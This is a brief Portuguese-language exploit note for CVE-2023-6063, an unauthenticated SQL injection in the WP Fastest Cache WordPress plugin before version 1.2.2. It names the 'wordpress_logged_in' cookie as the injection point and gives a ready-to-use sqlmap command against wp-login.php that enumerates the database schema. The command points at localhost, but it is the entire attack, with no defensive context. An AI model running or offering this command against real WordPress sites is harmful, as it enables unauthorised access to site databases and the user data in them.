
CVE-2023-6063 (WP Fastest Cache < 1.2.2 - Injeção SQL não autenticada)
Ative o "WP Fastest Cache".

O parâmetro de cookie "wordpress_logged_in" é vulnerável.
$ python sqlmap.py --dbms=mysql -u "http://127.0.0.1/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema
